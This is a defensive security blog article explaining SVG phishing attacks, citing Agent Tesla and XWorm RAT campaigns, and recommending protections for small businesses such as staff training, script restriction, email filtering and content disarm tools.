Phishing is one of the oldest cybercrime techniques in the book. Indeed, the first phishing email is thought to have originated back in the mists of time, around the year 1995. However, that doesn’t mean cybercriminals haven’t got creative in the years since. Added to recent innovations like smishing and Facebook Messenger scams, there’s a new threat to contend with: SVG phishing.
Here’s everything you need to know about this new threat, including what it is, how it works and, most importantly, how to counter it.
What is SVG phishing?
SVG phishing refers to the use of Scalable Vector Graphics (SVG) files in phishing attacks. An SVG is an image file format for creating and editing two-dimensional graphics. SVG files are a popular format for web and graphic design because they can be scaled up and down easily.
Cybercriminals use these files to deliver malware or direct victims to spoof forms that steal victims’ credentials.
Why do cybercriminals use SVG phishing attacks?
SVG phishing has gained traction in the cyber underworld because of its ability to evade traditional security measures. SVG files are less frequently flagged as potentially suspicious by security tools designed to detect more common file types like PDFs. This allows phishing emails containing SVG attachments to bypass many email filters, giving cybercriminals a route into target organisations.
How do SVG phishing attacks work in practice?
In practice, SVG attacks work much like any other phishing scam. Typically, a cybercriminal disguises the SVG files as legitimate documents or requests, using social engineering techniques to convince victims to open them.
It could be a request to edit a file from your ‘boss’ or a report that ‘requires your attention right now’, regardless, the techniques aren’t any more sophisticated than a typical phishing scam.
Once opened, these files can execute JavaScript, redirecting users to malicious websites, displaying fake login forms designed to capture sensitive information like passwords, or releasing malware into company systems.
However, while many SVG attacks aren’t particularly sophisticated, cybercriminals are getting smarter in how they launch them. There’s evidence of some campaigns using images that mimic documents like Excel spreadsheets, these include embedded forms for credential harvesting.
Are there any famous examples?
SVG phishing techniques have been in use since at least 2015, but media reports tend not to differentiate them from other types of phishing. Nevertheless, there are a couple of recent examples that researchers have identified.
1. Agent Tesla Keylogger: January – February 2024
Agent Tesla is a keylogger. It monitors keystrokes, takes screenshots, and steals passwords from various applications before sending the data back to the bad guys. It’s not a new form of malware; cybercriminals have been using it since around 2014, but in 2024, cybercriminals started delivering it via SVG files.
This campaign used a spoof Microsoft Excel spreadsheet, delivered via phishing emails. Once the victim opened the spreadsheet a script was run unleashing Agent Tesla.
2. XWorm RAT: December 2023 – present
The catchily named XWorm RAT is another form of malware, used for keylogging and stealing cryptocurrency wallets.
These campaigns used various techniques. Some used links embedded in phishing emails, and others included SVG files as attachments. Once opened, these SVG files initiated the download of zip archives containing XWorm RAT, unleashing the malware on the victim.
For some great examples of real-world SVG campaigns, we recommend checking out Cofense’s excellent phishing database.
What can you do to protect your business?
There’s no doubt SVG phishing poses a serious threat, able to avoid detection by many email filtering tools. But that doesn’t mean there’s nothing you can do to protect your business.
Staff training
We’re always championing the benefits of staff security training, but it’s particularly important when it comes to phishing. By their nature, phishing campaigns rely on social engineering techniques so, if you can train staff to recognise the tell-tale signs, you can effectively neuter the threat.
What training looks like will depend on the expertise within your organisation. You could
Implement realistic phishing simulations to test employee awareness or something more simple like webinars and videos. However you approach it, the key is that employees can quickly recognise suspicious emails and attachments.
Limit SVG Handling
One surefire way to mitigate the threat posed by SVG phishing is to limit what your email or browser can do. You can configure email platforms and browsers to block or restrict script execution within SVG files. This stops hidden nasties like Agent Telsa or XWorm RAT from running their malicious code.
Configure email filtering
In a similar vein to the previous point, more advanced email security solutions will be able to analyse attachments for malicious content. Check whether yours can analyse scripts embedded in SVG files. However, it’s worth noting that many email providers can’t do this yet, which is part of the reason for the success of SVG phishing campaigns.
Use CDR Technology
Admittedly, this solution is likely to be beyond the financial reach of most small businesses. Content Disarm and Reconstruction (CDR) solutions are expensive and tend to be the preserve of large corporations and those organisations that need to spend a lot on security.
But, if you’re feeling particularly flush, CDR is a great option for disarming SVG phishing. CDR systems treat all incoming files as potentially harmful. They deconstruct any incoming files, removing anything malicious, before rebuilding them and sending them on to the recipient.
Put policies in place
If your staff don’t understand the dangers of SVG files or the safe behaviours expected of them, they’re much more likely to fall prey to a scam.
Develop policies for handling email attachments, especially those from unknown or dubious sources. You could also consider restricting certain file types in email communications unless they’re absolutely necessary for operations.
Once you’ve set these policies, you need to ensure employees adhere to them. The best way to do this is to make them readily available (they’re no use buried in a long-forgotten corner of a shared drive) and log who’s read them.
Dangerous, but avoidable...
SVG phishing is dangerous, but it doesn’t have to be an insurmountable problem. By implementing these strategies, your business can significantly reduce the risks and protect company data.
Want to know more about the threats facing small businesses like yours? Check out our latest research report on the mobile threats facing SMEs.